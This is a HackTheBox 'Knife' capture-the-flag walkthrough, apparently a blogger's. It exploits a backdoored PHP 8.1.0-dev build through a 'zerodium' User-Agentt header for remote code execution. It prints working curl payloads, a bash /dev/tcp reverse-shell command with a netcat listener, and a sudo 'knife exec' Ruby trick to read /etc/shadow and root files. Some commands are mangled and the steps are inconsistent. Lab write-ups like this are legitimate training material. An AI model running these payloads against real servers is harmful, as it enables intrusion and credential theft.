HackTheBox Active Machine Walkthrough - Knife 🗡️

😍A knife is only as good as the one who wields it Hocho Knife #Easy #Linux Machine created by MrKN16H went live 22 May 2021 at 19:00:00 UTC.

😜Let's Start the journey.....

🔐Enumeration🔰

💉From Dmitry result one thing caught my and that is it an apache httpd server instead of regular nginx in all the HackTheBox Machine.

🔰We can find 2 Open Ports. In Port 80 We can see web page.

🔧As the latest release for apache httpd is 2.4.46 there could be a known vuln in 2.4.41 so I looked for it on web.

🗽Looking for it I stumbled around this Rapid7 Post https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2020-1934/.

🔰But there is one concerning thing about this exploit you need to have mod_proxy_ftp

module running and have FTP backend which we know nothing of.

🖥️Web-Visting🛡️

🤔We can find this static page and nothing 

interesting in it. 

🔐Looking the source code found pen.js which looked interesting but after looking at it got nothing interesting.

Also added knife.htb in /etc/hosts to look for sub-domain but interestingly we found the default nginx page.

😜This was interesting.

But let's go back to your main page.

Looking for Vulnerabilites I found one interesting thing that php 8.1.x-dev was backdoored by some hackers.

😏You can find articles on it.

https://techbeacon.com/security/php-backdoored-git-hack-its-no-joke-so-don't-be-fool

https://www.welivesecurity.com/2021/03/30/backdoor-php-source-code-git-server-breach/

This is interesting as server is leaking the the version of PHP.

☢️Wappalyzer detected it.

Looking through bunch of article finally came up to this one where it showed how to exploit this backdoored by some troll hackers.

https://blog.csdn.net/zy15667076526/article/details/116447864

💉The website is originally in chinese but the google translate works fine.

So let's see if your PHP is dev version or not.

$ curl -i http://10.10.10.241

🔐Looking at X-Powered-By header we can say that indeed we are in luck and the version is PHP/8.1.0-dev.

💉Exploitation☢️

😏Reading throught the article found out that the backdoor can be accessed using User-Agent Header to execute the code.

We have to append the string zerodium which is also one of the leading zero day vuln finder firm.

🤔So let's try PoC for this exploit.

$ curl-i-s-k-H'User-Agentt:zerodiumvar_dump(2*3);'http://10.10.10.242/

💉Looks like we triggered the RCE let's get going and get try to excute system commands.

$ curl -i -s -k -H 'User-Agentt: zerodiumsystem("id");' http://10.10.10.242/

🔐Looks like the web server is running as james so one less step for us.

Let's get the REV-Shell.

$ curl -i -s -k -H $'User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");' http://10.10.10.242

🔐And boom we have the shell😜

nc -nvlp 4242

listening on [any] 4242 ...

connect to [] from (UNKNOWN) [10.10.10.242] 60452

bash: cannot set terminal process group (966): Inappropriate ioctl for device

bash: no job control in this shell

id

id

uid=1000(james) gid=1000(james) groups=1000(james)

james@knife:/$ 

🔰User Privilege 😜

1 - Log on to Home directory ~ cd home

2 - Then Go to James directory ~cd james

3 - Cat user.txt ~ ls   ~cat user.txt

🔐Root Access😜

🔰Now we have the stable shell now lets enumerate for PrivESC.

 ☢️Enumeration

james@knife:~$ cat ex.rb 

puts File.read('/etc/shadow')

😏Looking into user's home directory we can see an intresting ruby file which can read /etc/shadow but the catch is we dont have ruby on the box or atleast on the desired path and the desired name.

 

james@knife:~$ sudo -l

🛡️Matching Defaults entries for james on knife:

    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

👍User james may run the following commands on knife:

    (root) NOPASSWD: /usr/bin/knife

Analysing the file /usr/bin/knife

james@knife:~$ file /usr/bin/knife 

/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife

🔐It's symbolic link to another file /opt/chef-workstation/bin/knife.

looking at the directory /opt/chef-workstation we can see it a ruby installation.

james@knife:~$ ls /opt/chef-workstation/

bin  components  embedded  gem-version-manifest.json  gitbin  LICENSE  LICENSES  version-manifest.json  version-manifest.txt

☢️So basically on this box ruby commands can be run using /usr/bin/knife.

running /usr/bin/knife we get the big help menu.

james@knife:~$ sudo /usr/bin/knife

cd /tmp

echo 'puts File.read("/root/root.txt")' > rev.rb

😏Now let's run our ex.rb script

james@knife:~$ sudo /usr/bin/knife exec ex.rb

!!!!!!Rooted!!!!!